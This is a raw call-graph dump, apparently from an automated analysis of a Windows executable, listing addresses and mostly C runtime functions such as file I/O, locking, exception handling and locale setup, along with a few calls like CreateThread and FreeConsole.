__fread_nolock 15725->15749 15727 6f4283 15726->15727 15729 6f42e1 15726->15729 15728 6ec785 __strnicoll 44 API calls 15727->15728 15728->15749 15730 6f42f8 15729->15730 15731 6f5deb ___scrt_uninitialize_crt 46 API calls 15729->15731 15732 6f3dde ___scrt_uninitialize_crt 45 API calls 15730->15732 15731->15730 15733 6f4302 15732->15733 15734 6f4348 15733->15734 15735 6f4308 15733->15735 15737 6f435c 15734->15737 15738 6f43ab WriteFile 15734->15738 15736 6f4332 15735->15736 15739 6f430f 15735->15739 15740 6f39a4 ___scrt_uninitialize_crt 50 API calls 15736->15740 15742 6f4399 15737->15742 15743 6f4364 15737->15743 15741 6f43cd GetLastError 15738->15741 15751 6f4343 15738->15751 15744 6f3d76 ___scrt_uninitialize_crt 6 API calls 15739->15744 15739->15749 15740->15751 15741->15751 15745 6f3e5c ___scrt_uninitialize_crt 7 API calls 15742->15745 15746 6f4369 15743->15746 15747 6f4387 15743->15747 15744->15749 15745->15749 15746->15749 15750 6f4372 15746->15750 15748 6f4020 ___scrt_uninitialize_crt 8 API calls 15747->15748 15748->15751 15749->15720 15752 6f3f37 ___scrt_uninitialize_crt 7 API calls 15750->15752 15751->15749 15752->15749 15754 6f93ed ___scrt_uninitialize_crt LeaveCriticalSection 15753->15754 15755 6f4220 15754->15755 15755->15723 15756->15657 15763 6e150d 15757->15763 15761 6e1235 Concurrency::cancel_current_task 44 API calls 15760->15761 15762 6e158c 15761->15762 15762->15577 15764 6e2493 std::_Throw_Cpp_error 45 API calls 15763->15764 15765 6e1531 15764->15765 15772 6e147d 15765->15772 15768 6e2520 std::_Throw_Cpp_error 44 API calls 15769 6e154c 15768->15769 15770 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15769->15770 15771 6e1560 15770->15771 15771->15612 15783 6e24ec 15772->15783 15779 6e2520 std::_Throw_Cpp_error 44 API calls 15780 6e14c0 15779->15780 15781 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15780->15781 15782 6e14df 15781->15782 15782->15768 15784 6e250c 15783->15784 15803 6e2b76 15784->15803 15786 6e149e 15787 6e13fb 15786->15787 15788 6e142c 15787->15788 15789 6e1416 std::_Throw_Cpp_error 15787->15789 15791 6e2581 std::_Throw_Cpp_error 45 API calls 15788->15791 15810 6e2581 15789->15810 15792 6e1452 15791->15792 15793 6e2520 std::_Throw_Cpp_error 44 API calls 15792->15793 15794 6e145a std::_Throw_Cpp_error 15793->15794 15795 6e2520 std::_Throw_Cpp_error 44 API calls 15794->15795 15796 6e146d 15795->15796 15797 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15796->15797 15798 6e147b 15797->15798 15799 6e1339 15798->15799 15800 6e1346 15799->15800 15801 6e1200 std::exception::exception 44 API calls 15800->15801 15802 6e134e 15801->15802 15802->15779 15804 6e2bd8 15803->15804 15807 6e2b87 std::_Throw_Cpp_error 15803->15807 15805 6e132e std::_Throw_Cpp_error 45 API calls 15804->15805 15806 6e2bdd 15805->15806 15808 6e3709 std::_Throw_Cpp_error 45 API calls 15807->15808 15809 6e2b8e std::_Throw_Cpp_error ctype 15807->15809 15808->15809 15809->15786 15811 6e25c1 15810->15811 15813 6e2597 std::_Throw_Cpp_error 15810->15813 15814 6e2c78 15811->15814 15813->15788 15815 6e2d26 15814->15815 15816 6e2c95 std::_Throw_Cpp_error 15814->15816 15817 6e132e std::_Throw_Cpp_error 45 API calls 15815->15817 15819 6e3709 std::_Throw_Cpp_error 45 API calls 15816->15819 15818 6e2d2b 15817->15818 15820 6e2cb4 std::_Throw_Cpp_error 15819->15820 15821 6e2d2c _Deallocate 44 API calls 15820->15821 15822 6e2cf4 std::_Throw_Cpp_error 15820->15822 15821->15822 15822->15813 15824 6e3344 __EH_prolog3_catch 15823->15824 15825 6e3380 codecvt 15824->15825 15826 6e1caf std::ios_base::_Init 45 API calls 15824->15826 15825->15615 15826->15825 15828 6e35b9 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 15827->15828 15831 6e35e4 15827->15831 15829 6e35ab 44 API calls 15828->15829 15830 6e2520 std::_Throw_Cpp_error 44 API calls 15828->15830 15828->15831 15829->15828 15830->15828 15831->15584 15842 6e6b6e EnterCriticalSection 15832->15842 15834 6e3b58 15834->15218 15836 6e6fb3 ReleaseSRWLockExclusive 15835->15836 15837 6e6fc1 15835->15837 15836->15837 15837->15218 15838->15218 15843 6e6b7c LeaveCriticalSection 15839->15843 15841 6e3b64 15841->15178 15842->15834 15843->15841 20553 6eded1 20554 6edee4 _Fputc 20553->20554 20559 6ede08 20554->20559 20556 6edef9 20557 6ec320 _Fputc 44 API calls 20556->20557 20558 6edf06 20557->20558 20560 6ede1a 20559->20560 20562 6ede3d 20559->20562 20561 6ec785 __strnicoll 44 API calls 20560->20561 20563 6ede35 20561->20563 20562->20560 20564 6ede64 20562->20564 20563->20556 20567 6edd0d 20564->20567 20568 6edd19 __FrameHandler3::FrameUnwindToState 20567->20568 20575 6ecb78 EnterCriticalSection 20568->20575 20570 6edd27 20576 6edd68 20570->20576 20572 6edd34 20585 6edd5c 20572->20585 20575->20570 20577 6ecf32 ___scrt_uninitialize_crt 69 API calls 20576->20577 20578 6edd83 20577->20578 20579 6f341d 14 API calls 20578->20579 20580 6edd8d 20579->20580 20581 6f1f12 __InternalCxxFrameHandler 14 API calls 20580->20581 20583 6edda8 20580->20583 20582 6eddcc 20581->20582 20584 6f1f6f ___free_lconv_mon 14 API calls 20582->20584 20583->20572 20584->20583 20588 6ecb8c LeaveCriticalSection 20585->20588 20587 6edd45 20587->20556 20588->20587 17240 6e4c85 17241 6e4c91 17240->17241 17242 6e4c9c 17241->17242 17245 6e4b19 17241->17245 17250 6e3df7 17245->17250 17248 6e7548 std::_Throw_Cpp_error 5 API calls 17249 6e4c51 17248->17249 17253 6ed0a5 17250->17253 17252 6e3e02 17252->17248 17254 6ed0b1 __FrameHandler3::FrameUnwindToState 17253->17254 17255 6ed0bb 17254->17255 17256 6ed0d3 17254->17256 17257 6ec900 __strnicoll 14 API calls 17255->17257 17273 6ecb78 EnterCriticalSection 17256->17273 17259 6ed0c0 17257->17259 17261 6ec802 __strnicoll 44 API calls 17259->17261 17260 6ed0dd 17262 6ed179 17260->17262 17263 6f364f _Ungetc 44 API calls 17260->17263 17267 6ed0cb _Fputc 17261->17267 17274 6ed05e 17262->17274 17269 6ed0fa 17263->17269 17265 6ed17f 17281 6ed1a9 17265->17281 17267->17252 17268 6ed151 17270 6ec900 __strnicoll 14 API calls 17268->17270 17269->17262 17269->17268 17271 6ed156 17270->17271 17272 6ec802 __strnicoll 44 API calls 17271->17272 17272->17267 17273->17260 17275 6ed06a 17274->17275 17278 6ed07f __fread_nolock 17274->17278 17276 6ec900 __strnicoll 14 API calls 17275->17276 17277 6ed06f 17276->17277 17279 6ec802 __strnicoll 44 API calls 17277->17279 17278->17265 17280 6ed07a 17279->17280 17280->17265 17284 6ecb8c LeaveCriticalSection 17281->17284 17283 6ed1af 17283->17267 17284->17283 18535 6e614c 18537 6e6158 __EH_prolog3_GS 18535->18537 18536 6e616f 18538 6e7548 std::_Throw_Cpp_error 5 API calls 18536->18538 18537->18536 18539 6e61a7 18537->18539 18546 6e61c1 18537->18546 18540 6e628b 18538->18540 18549 6e54ff 18539->18549 18542 6ed0a5 46 API calls 18542->18546 18543 6e2546 45 API calls 18543->18546 18544 6e2520 std::_Throw_Cpp_error 44 API calls 18544->18536 18545 6e6270 18545->18544 18546->18542 18546->18543 18546->18545 18548 6e62ab 18546->18548 18547 6ee004 46 API calls 18547->18548 18548->18545 18548->18547 18552 6ee47f 18549->18552 18553 6ee48b __FrameHandler3::FrameUnwindToState 18552->18553 18554 6ee4a9 18553->18554 18555 6ee492 18553->18555 18565 6ecb78 EnterCriticalSection 18554->18565 18556 6ec900 __strnicoll 14 API calls 18555->18556 18558 6ee497 18556->18558 18560 6ec802 __strnicoll 44 API calls 18558->18560 18559 6ee4b5 18566 6ee30f 18559->18566 18562 6e550a 18560->18562 18562->18536 18563 6ee4c0 18593 6ee4ee 18563->18593 18565->18559 18567 6ee32c 18566->18567 18569 6ee355 18566->18569 18568 6f364f _Ungetc 44 API calls 18567->18568 18570 6ee332 18568->18570 18571 6f364f _Ungetc 44 API calls 18569->18571 18592 6ee370 18569->18592 18570->18569 18573 6f364f _Ungetc 44 API calls 18570->18573 18572 6ee3a7 18571->18572 18574 6f364f _Ungetc 44 API calls 18572->18574 18578 6ee3ca 18572->18578 18575 6ee33e 18573->18575 18576 6ee3b3 18574->18576 18575->18569 18577 6f364f _Ungetc 44 API calls 18575->18577 18576->18578 18580 6f364f _Ungetc 44 API calls 18576->18580 18579 6ee34a 18577->18579 18581 6ee9e2 __Getctype 44 API calls 18578->18581 18578->18592 18582 6f364f _Ungetc 44 API calls 18579->18582 18583 6ee3bf 18580->18583 18587 6ee402 18581->18587 18582->18569 18584 6f364f _Ungetc 44 API calls 18583->18584 18584->18578 18585 6ee42c 18596 6f67b6 18585->18596 18587->18585 18589 6ee419 18587->18589 18591 6ee004 46 API calls 18589->18591 18590 6ec900 __strnicoll 14 API calls 18590->18592 18591->18592 18592->18563 18636 6ecb8c LeaveCriticalSection 18593->18636 18595 6ee4f4 18595->18562 18597 6f67c9 _Fputc 18596->18597 18602 6f6683 18597->18602 18600 6ec320 _Fputc 44 API calls 18601 6ee440 18600->18601 18601->18590 18601->18592 18604 6f6697 18602->18604 18612 6f66a7 18602->18612 18603 6f66cc 18606 6f66dd 18603->18606 18607 6f6700 18603->18607 18604->18603 18604->18612 18614 6ec470 18604->18614 18621 6fbefe 18606->18621 18609 6f677c 18607->18609 18610 6f6728 18607->18610 18607->18612 18611 6f7a26 __fread_nolock MultiByteToWideChar 18609->18611 18610->18612 18613 6f7a26 __fread_nolock MultiByteToWideChar 18610->18613 18611->18612 18612->18600 18613->18612 18615 6ec3b0 _Fputc 44 API calls 18614->18615 18616 6ec480 18615->18616 18624 6f2fdd 18616->18624 18632 6fd042 18621->18632 18625 6ec49d 18624->18625 18626 6f2ff4 18624->18626 18628 6f303b 18625->18628 18626->18625 18627 6fa4b7 __Getctype 44 API calls 18626->18627 18627->18625 18629 6ec4aa 18628->18629 18630 6f3052 18628->18630 18629->18603 18630->18629 18631 6f8b9a __strnicoll 44 API calls 18630->18631 18631->18629 18633 6fd06d _Fputc 18632->18633 18634 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18633->18634 18635 6fbf19 18634->18635 18635->18612 18636->18595 18682 6e455f 18683 6e4566 18682->18683 18684 6e45b2 18682->18684 18687 6ecb78 EnterCriticalSection 18683->18687 18686 6e456b 18687->18686 16030 6e7157 16031 6e7163 __FrameHandler3::FrameUnwindToState 16030->16031 16056 6e7359 16031->16056 16033 6e716a 16034 6e72c3 16033->16034 16042 6e7194 ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler ___scrt_release_startup_lock 16033->16042 16123 6e7b35 IsProcessorFeaturePresent 16034->16123 16036 6e72ca 16102 6f014d 16036->16102 16039 6f0111 __InternalCxxFrameHandler 23 API calls 16040 6e72d8 16039->16040 16041 6e71b3 16042->16041 16043 6e7234 16042->16043 16105 6f0127 16042->16105 16067 6efd8b 16043->16067 16046 6e723a 16071 6e22ba 16046->16071 16057 6e7362 16056->16057 16127 6e7630 IsProcessorFeaturePresent 16057->16127 16061 6e7373 16066 6e7377 16061->16066 16137 6f1d64 16061->16137 16064 6e738e 16064->16033 16066->16033 16068 6efd99 16067->16068 16069 6efd94 16067->16069 16068->16046 16209 6efae5 16069->16209 16072 6e7031 codecvt 45 API calls 16071->16072 16073 6e22d8 16072->16073 16552 6eb8bf 16073->16552 16075 6e22f4 16076 6e231e 16075->16076 16077 6e2303 FreeConsole 16075->16077 16602 6e3c46 16076->16602 16077->16076 16078 6e2313 GetCurrentThreadId 16077->16078 16078->16076 16080 6e2325 16078->16080 16567 6e6a98 WaitForSingleObjectEx 16080->16567 16086 6e2341 16573 6e26a5 16086->16573 16088 6e2368 16583 6e292c 16088->16583 17085 6eff35 16102->17085 16106 6f013d __FrameHandler3::FrameUnwindToState 16105->16106 16107 6eb950 __FrameHandler3::FrameUnwindToState 16105->16107 16106->16043 16108 6f22e9 __Getctype 44 API calls 16107->16108 16110 6eb961 16108->16110 16109 6ec9ca __FrameHandler3::FrameUnwindToState 44 API calls 16111 6eb98b 16109->16111 16110->16109 16124 6e7b4b __InternalCxxFrameHandler __fread_nolock 16123->16124 16125 6e7bf6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16124->16125 16126 6e7c3a __InternalCxxFrameHandler 16125->16126 16126->16036 16128 6e736e 16127->16128 16129 6ea37e 16128->16129 16146 6eb457 16129->16146 16132 6ea387 16132->16061 16134 6ea38f 16135 6ea39a 16134->16135 16160 6eb493 16134->16160 16135->16061 16200 6fb865 16137->16200 16140 6ea39d 16141 6ea3a6 16140->16141 16142 6ea3b0 16140->16142 16143 6ea516 ___vcrt_uninitialize_ptd 6 API calls 16141->16143 16142->16066 16144 6ea3ab 16143->16144 16145 6eb493 ___vcrt_uninitialize_locks DeleteCriticalSection 16144->16145 16145->16142 16147 6eb460 16146->16147 16149 6eb489 16147->16149 16150 6ea383 16147->16150 16164 6eb69c 16147->16164 16151 6eb493 ___vcrt_uninitialize_locks DeleteCriticalSection 16149->16151 16150->16132 16152 6ea4e3 16150->16152 16151->16150 16181 6eb5ad 16152->16181 16155 6ea4f8 16155->16134 16158 6ea513 16158->16134 16161 6eb4bd 16160->16161 16162 6eb49e 16160->16162 16161->16132 16163 6eb4a8 DeleteCriticalSection 16162->16163 16163->16161 16163->16163 16169 6eb4c2 16164->16169 16167 6eb6d4 InitializeCriticalSectionAndSpinCount 16168 6eb6bf 16167->16168 16168->16147 16170 6eb4df 16169->16170 16171 6eb4e3 16169->16171 16170->16167 16170->16168 16171->16170 16173 6eb54b GetProcAddress 16171->16173 16174 6eb53c 16171->16174 16176 6eb562 LoadLibraryExW 16171->16176 16173->16170 16174->16173 16175 6eb544 FreeLibrary 16174->16175 16175->16173 16177 6eb5a9 16176->16177 16178 6eb579 GetLastError 16176->16178 16177->16171 16178->16177 16179 6eb584 ___vcrt_InitializeCriticalSectionEx 16178->16179 16179->16177 16180 6eb59a LoadLibraryExW 16179->16180 16180->16171 16182 6eb4c2 ___vcrt_InitializeCriticalSectionEx 5 API calls 16181->16182 16183 6eb5c7 16182->16183 16184 6eb5e0 TlsAlloc 16183->16184 16185 6ea4ed 16183->16185 16185->16155 16186 6eb65e 16185->16186 16187 6eb4c2 ___vcrt_InitializeCriticalSectionEx 5 API calls 16186->16187 16188 6eb678 16187->16188 16189 6eb693 TlsSetValue 16188->16189 16190 6ea506 16188->16190 16189->16190 16190->16158 16191 6ea516 16190->16191 16192 6ea526 16191->16192 16193 6ea520 16191->16193 16192->16155 16195 6eb5e8 16193->16195 16196 6eb4c2 ___vcrt_InitializeCriticalSectionEx 5 API calls 16195->16196 16197 6eb602 16196->16197 16198 6eb61a TlsFree 16197->16198 16199 6eb60e 16197->16199 16198->16199 16199->16192 16201 6fb875 16200->16201 16202 6e7380 16200->16202 16201->16202 16204 6f3513 16201->16204 16202->16064 16202->16140 16205 6f351a 16204->16205 16206 6f355d GetStdHandle 16205->16206 16207 6f35bf 16205->16207 16208 6f3570 GetFileType 16205->16208 16206->16205 16207->16201 16208->16205 16210 6efb04 16209->16210 16211 6efaee 16209->16211 16210->16068 16211->16210 16215 6efb11 16211->16215 16213 6efafb 16213->16210 16232 6efc7c 16213->16232 16216 6efb1d 16215->16216 16217 6efb1a 16215->16217 16240 6f8b52 16216->16240 16217->16213 16222 6efb2e 16224 6f1f6f ___free_lconv_mon 14 API calls 16222->16224 16223 6efb3a 16267 6efb6b 16223->16267 16226 6efb34 16224->16226 16226->16213 16228 6f1f6f ___free_lconv_mon 14 API calls 16229 6efb5e 16228->16229 16230 6f1f6f ___free_lconv_mon 14 API calls 16229->16230 16231 6efb64 16230->16231 16231->16213 16233 6efced 16232->16233 16238 6efc8b 16232->16238 16233->16210 16234 6f7aa2 WideCharToMultiByte _Fputc 16234->16238 16235 6f1f12 __InternalCxxFrameHandler 14 API calls 16235->16238 16236 6efcf1 16237 6f1f6f ___free_lconv_mon 14 API calls 16236->16237 16237->16233 16238->16233 16238->16234 16238->16235 16238->16236 16239 6f1f6f ___free_lconv_mon 14 API calls 16238->16239 16239->16238 16241 6f8b5b 16240->16241 16242 6efb23 16240->16242 16289 6f23a4 16241->16289 16246 6f8e54 GetEnvironmentStringsW 16242->16246 16247 6f8e6c 16246->16247 16262 6efb28 16246->16262 16248 6f7aa2 _Fputc WideCharToMultiByte 16247->16248 16249 6f8e89 16248->16249 16250 6f8e9e 16249->16250 16251 6f8e93 FreeEnvironmentStringsW 16249->16251 16252 6f5f8a __fread_nolock 15 API calls 16250->16252 16251->16262 16253 6f8ea5 16252->16253 16254 6f8ebe 16253->16254 16255 6f8ead 16253->16255 16257 6f7aa2 _Fputc WideCharToMultiByte 16254->16257 16256 6f1f6f ___free_lconv_mon 14 API calls 16255->16256 16259 6f8eb2 FreeEnvironmentStringsW 16256->16259 16258 6f8ece 16257->16258 16260 6f8edd 16258->16260 16261 6f8ed5 16258->16261 16259->16262 16264 6f1f6f ___free_lconv_mon 14 API calls 16260->16264 16263 6f1f6f ___free_lconv_mon 14 API calls 16261->16263 16262->16222 16262->16223 16265 6f8edb FreeEnvironmentStringsW 16263->16265 16264->16265 16265->16262 16268 6efb80 16267->16268 16269 6f1f12 __InternalCxxFrameHandler 14 API calls 16268->16269 16270 6efba7 16269->16270 16271 6efbaf 16270->16271 16280 6efbb9 16270->16280 16272 6f1f6f ___free_lconv_mon 14 API calls 16271->16272 16288 6efb41 16272->16288 16273 6efc16 16274 6f1f6f ___free_lconv_mon 14 API calls 16273->16274 16274->16288 16275 6f1f12 __InternalCxxFrameHandler 14 API calls 16275->16280 16276 6efc25 16546 6efc4d 16276->16546 16278 6f1e05 ___std_exception_copy 44 API calls 16278->16280 16280->16273 16280->16275 16280->16276 16280->16278 16282 6efc40 16280->16282 16284 6f1f6f ___free_lconv_mon 14 API calls 16280->16284 16281 6f1f6f ___free_lconv_mon 14 API calls 16283 6efc32 16281->16283 16285 6ec82f __Getctype 11 API calls 16282->16285 16286 6f1f6f ___free_lconv_mon 14 API calls 16283->16286 16284->16280 16287 6efc4c 16285->16287 16286->16288 16288->16228 16290 6f23af 16289->16290 16294 6f23b5 16289->16294 16292 6f2ac6 __Getctype 6 API calls 16290->16292 16291 6f2b05 __Getctype 6 API calls 16293 6f23cf 16291->16293 16292->16294 16295 6f23bb 16293->16295 16296 6f1f12 __InternalCxxFrameHandler 14 API calls 16293->16296 16294->16291 16294->16295 16297 6ec9ca __FrameHandler3::FrameUnwindToState 44 API calls 16295->16297 16298 6f23c0 16295->16298 16299 6f23df 16296->16299 16300 6f2439 16297->16300 16314 6f895d 16298->16314 16301 6f23fc 16299->16301 16302 6f23e7 16299->16302 16304 6f2b05 __Getctype 6 API calls 16301->16304 16303 6f2b05 __Getctype 6 API calls 16302->16303 16305 6f23f3 16303->16305 16306 6f2408 16304->16306 16311 6f1f6f ___free_lconv_mon 14 API calls 16305->16311 16307 6f240c 16306->16307 16308 6f241b 16306->16308 16309 6f2b05 __Getctype 6 API calls 16307->16309 16310 6f2117 __Getctype 14 API calls 16308->16310 16309->16305 16312 6f2426 16310->16312 16311->16295 16313 6f1f6f ___free_lconv_mon 14 API calls 16312->16313 16313->16298 16337 6f8ab2 16314->16337 16319 6f89a0 16319->16242 16320 6f5f8a __fread_nolock 15 API calls 16321 6f89b1 16320->16321 16322 6f89b9 16321->16322 16323 6f89c7 16321->16323 16324 6f1f6f ___free_lconv_mon 14 API calls 16322->16324 16355 6f8bad 16323->16355 16324->16319 16327 6f89ff 16328 6ec900 __strnicoll 14 API calls 16327->16328 16330 6f8a04 16328->16330 16329 6f8a1a 16333 6f8a46 16329->16333 16336 6f1f6f ___free_lconv_mon 14 API calls 16329->16336 16331 6f1f6f ___free_lconv_mon 14 API calls 16330->16331 16331->16319 16332 6f8a8f 16335 6f1f6f ___free_lconv_mon 14 API calls 16332->16335 16333->16332 16366 6f85cf 16333->16366 16335->16319 16336->16333 16338 6f8abe __FrameHandler3::FrameUnwindToState 16337->16338 16340 6f8ad8 16338->16340 16374 6ec954 EnterCriticalSection 16338->16374 16341 6f8987 16340->16341 16343 6ec9ca __FrameHandler3::FrameUnwindToState 44 API calls 16340->16343 16348 6f86dd 16341->16348 16342 6f8b14 16375 6f8b31 16342->16375 16345 6f8b51 16343->16345 16346 6f8ae8 16346->16342 16347 6f1f6f ___free_lconv_mon 14 API calls 16346->16347 16347->16342 16379 6ef05c 16348->16379 16351 6f86fe GetOEMCP 16354 6f8727 16351->16354 16352 6f8710 16353 6f8715 GetACP 16352->16353 16352->16354 16353->16354 16354->16319 16354->16320 16356 6f86dd 46 API calls 16355->16356 16358 6f8bcd 16356->16358 16357 6f8c46 __fread_nolock 16359 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16357->16359 16358->16357 16360 6f8c0a IsValidCodePage 16358->16360 16361 6f89f4 16359->16361 16360->16357 16362 6f8c1c 16360->16362 16361->16327 16361->16329 16363 6f8c4b GetCPInfo 16362->16363 16365 6f8c25 __fread_nolock 16362->16365 16363->16357 16363->16365 16448 6f87b1 16365->16448 16367 6f85db __FrameHandler3::FrameUnwindToState 16366->16367 16520 6ec954 EnterCriticalSection 16367->16520 16369 6f85e5 16521 6f861c 16369->16521 16374->16346 16378 6ec99c LeaveCriticalSection 16375->16378 16377 6f8b38 16377->16340 16378->16377 16380 6ef07a 16379->16380 16381 6ef073 16379->16381 16380->16381 16387 6f22e9 GetLastError 16380->16387 16381->16351 16381->16352 16388 6f22ff 16387->16388 16389 6f2305 16387->16389 16390 6f2ac6 __Getctype 6 API calls 16388->16390 16391 6f2b05 __Getctype 6 API calls 16389->16391 16393 6f2309 SetLastError 16389->16393 16390->16389 16392 6f2321 16391->16392 16392->16393 16395 6f1f12 __InternalCxxFrameHandler 14 API calls 16392->16395 16397 6f239e 16393->16397 16398 6ef09b 16393->16398 16396 6f2336 16395->16396 16400 6f234f 16396->16400 16401 6f233e 16396->16401 16399 6ec9ca __FrameHandler3::FrameUnwindToState 42 API calls 16397->16399 16414 6f2fb0 16398->16414 16403 6f23a3 16399->16403 16402 6f2b05 __Getctype 6 API calls 16400->16402 16404 6f2b05 __Getctype 6 API calls 16401->16404 16405 6f235b 16402->16405 16406 6f234c 16404->16406 16407 6f235f 16405->16407 16408 6f2376 16405->16408 16410 6f1f6f ___free_lconv_mon 14 API calls 16406->16410 16409 6f2b05 __Getctype 6 API calls 16407->16409 16411 6f2117 __Getctype 14 API calls 16408->16411 16409->16406 16410->16393 16412 6f2381 16411->16412 16413 6f1f6f ___free_lconv_mon 14 API calls 16412->16413 16413->16393 16415 6ef0b1 16414->16415 16416 6f2fc3 16414->16416 16418 6f300e 16415->16418 16416->16415 16422 6fa4b7 16416->16422 16419 6f3036 16418->16419 16420 6f3021 16418->16420 16419->16381 16420->16419 16443 6f8b9a 16420->16443 16423 6fa4c3 __FrameHandler3::FrameUnwindToState 16422->16423 16424 6f22e9 __Getctype 44 API calls 16423->16424 16425 6fa4cc 16424->16425 16432 6fa512 16425->16432 16435 6ec954 EnterCriticalSection 16425->16435 16427 6fa4ea 16436 6fa538 16427->16436 16432->16415 16433 6ec9ca __FrameHandler3::FrameUnwindToState 44 API calls 16434 6fa537 16433->16434 16435->16427 16437 6fa546 __Getctype 16436->16437 16439 6fa4fb 16436->16439 16438 6fa26b __Getctype 14 API calls 16437->16438 16437->16439 16438->16439 16440 6fa517 16439->16440 16441 6ec99c std::_Lockit::~_Lockit LeaveCriticalSection 16440->16441 16442 6fa50e 16441->16442 16442->16432 16442->16433 16444 6f22e9 __Getctype 44 API calls 16443->16444 16445 6f8b9f 16444->16445 16446 6f8ab2 __strnicoll 44 API calls 16445->16446 16447 6f8baa 16446->16447 16447->16419 16449 6f87d9 GetCPInfo 16448->16449 16450 6f88a2 16448->16450 16449->16450 16451 6f87f1 16449->16451 16453 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16450->16453 16459 6f6c28 16451->16459 16455 6f895b 16453->16455 16455->16357 16460 6ef05c __strnicoll 44 API calls 16459->16460 16461 6f6c48 16460->16461 16462 6f7a26 __fread_nolock MultiByteToWideChar 16461->16462 16466 6f6c75 16462->16466 16463 6f6d0c 16464 6f6d04 16466->16463 16466->16464 16469 6f5f8a __fread_nolock 15 API calls 16466->16469 16470 6f6c9a __fread_nolock __alloca_probe_16 16466->16470 16469->16470 16470->16464 16520->16369 16531 6ed63a 16521->16531 16532 6ed64b 16531->16532 16547 6efc5a 16546->16547 16548 6efc2b 16546->16548 16549 6efc71 16547->16549 16551 6f1f6f ___free_lconv_mon 14 API calls 16547->16551 16548->16281 16550 6f1f6f ___free_lconv_mon 14 API calls 16549->16550 16550->16548 16551->16547 16553 6eb8cc 16552->16553 16554 6eb8e0 16552->16554 16556 6ec900 __strnicoll 14 API calls 16553->16556 16614 6eb86f 16554->16614 16557 6eb8d1 16556->16557 16559 6ec802 __strnicoll 44 API calls 16557->16559 16561 6eb8dc 16559->16561 16560 6eb8f5 CreateThread 16562 6eb914 GetLastError 16560->16562 16563 6eb920 16560->16563 16631 6eb763 16560->16631 16561->16075 16564 6ec8a6 __dosmaperr 14 API calls 16562->16564 16623 6eb7e1 16563->16623 16564->16563 16568 6e6aaf 16567->16568 16569 6e2333 16567->16569 16570 6e6acc FindCloseChangeNotification 16568->16570 16571 6e6ab6 GetExitCodeThread 16568->16571 16569->16076 16569->16086 16570->16569 16571->16569 16572 6e6ac7 16571->16572 16572->16570 16574 6e26b1 std::_Throw_Cpp_error __EH_prolog3_catch 16573->16574 16686 6e2dfb 16574->16686 16577 6e1caf std::ios_base::_Init 45 API calls 16578 6e2916 16577->16578 16580 6e2de0 45 API calls 16578->16580 16581 6e291e codecvt 16580->16581 16581->16088 16582 6e272b std::ios_base::_Ios_base_dtor 16582->16577 16584 6e2938 __EH_prolog3_catch 16583->16584 16992 6e3141 16584->16992 16586 6e296c 16587 6e29f7 16586->16587 17003 6e262c 16586->17003 16603 6e3c5c std::_Throw_Cpp_error 16602->16603 17072 6e3b66 16603->17072 16615 6f1f12 __InternalCxxFrameHandler 14 API calls 16614->16615 16616 6eb880 16615->16616 16617 6f1f6f ___free_lconv_mon 14 API calls 16616->16617 16618 6eb88d 16617->16618 16619 6eb894 GetModuleHandleExW 16618->16619 16620 6eb8b1 16618->16620 16619->16620 16621 6eb7e1 16 API calls 16620->16621 16622 6eb8b9 16621->16622 16622->16560 16622->16563 16624 6eb7ed 16623->16624 16625 6eb811 16623->16625 16626 6eb7fc 16624->16626 16627 6eb7f3 CloseHandle 16624->16627 16625->16075 16628 6eb80b 16626->16628 16629 6eb802 FreeLibrary 16626->16629 16627->16626 16630 6f1f6f ___free_lconv_mon 14 API calls 16628->16630 16629->16628 16630->16625 16632 6eb76f __FrameHandler3::FrameUnwindToState 16631->16632 16633 6eb776 GetLastError ExitThread 16632->16633 16634 6eb783 16632->16634 16635 6f22e9 __Getctype 44 API calls 16634->16635 16636 6eb788 16635->16636 16645 6f2e07 16636->16645 16640 6eb79f 16650 6eb942 16640->16650 16646 6f2e19 GetPEB 16645->16646 16649 6eb793 16645->16649 16647 6f2e2c 16646->16647 16646->16649 16656 6f2938 16647->16656 16649->16640 16653 6f2d12 16649->16653 16674 6eb818 16650->16674 16654 6f2875 __FrameHandler3::FrameUnwindToState 5 API calls 16653->16654 16655 6f2d2e 16654->16655 16655->16640 16659 6f2875 16656->16659 16660 6f28a3 16659->16660 16664 6f289f 16659->16664 16660->16664 16666 6f27aa 16660->16666 16663 6f28bd GetProcAddress 16663->16664 16665 6f28cd __FrameHandler3::FrameUnwindToState 16663->16665 16664->16649 16665->16664 16672 6f27bb ___vcrt_InitializeCriticalSectionEx 16666->16672 16667 6f2851 16667->16663 16667->16664 16668 6f27d9 LoadLibraryExW 16669 6f2858 16668->16669 16670 6f27f4 GetLastError 16668->16670 16669->16667 16671 6f286a FreeLibrary 16669->16671 16670->16672 16671->16667 16672->16667 16672->16668 16673 6f2827 LoadLibraryExW 16672->16673 16673->16669 16673->16672 16675 6f243a __dosmaperr 14 API calls 16674->16675 16678 6eb823 16675->16678 16676 6eb865 ExitThread 16677 6eb83c 16680 6eb84f 16677->16680 16681 6eb848 CloseHandle 16677->16681 16678->16676 16678->16677 16683 6f2d4d 16678->16683 16680->16676 16682 6eb85b FreeLibraryAndExitThread 16680->16682 16681->16680 16682->16676 16684 6f2875 __FrameHandler3::FrameUnwindToState 5 API calls 16683->16684 16685 6f2d66 16684->16685 16685->16677 16688 6e2e19 16686->16688 16687 6e2725 16687->16582 16690 6e3532 16687->16690 16688->16687 16705 6e327a 16688->16705 16713 6e3ad7 16690->16713 16694 6e3556 16703 6e3569 16694->16703 16725 6e19a8 16694->16725 16697 6e359f 16697->16582 16699 6e35a5 16745 6e1610 16699->16745 16700 6e3580 16735 6e51ba 16700->16735 16738 6e3b2f 16703->16738 16706 6e3286 __EH_prolog3_catch 16705->16706 16707 6e332b codecvt 16706->16707 16708 6e2dfb 45 API calls 16706->16708 16707->16687 16711 6e32a5 16708->16711 16709 6e3323 16710 6e2de0 45 API calls 16709->16710 16710->16707 16711->16709 16712 6e1caf std::ios_base::_Init 45 API calls 16711->16712 16712->16709 16714 6e3aed 16713->16714 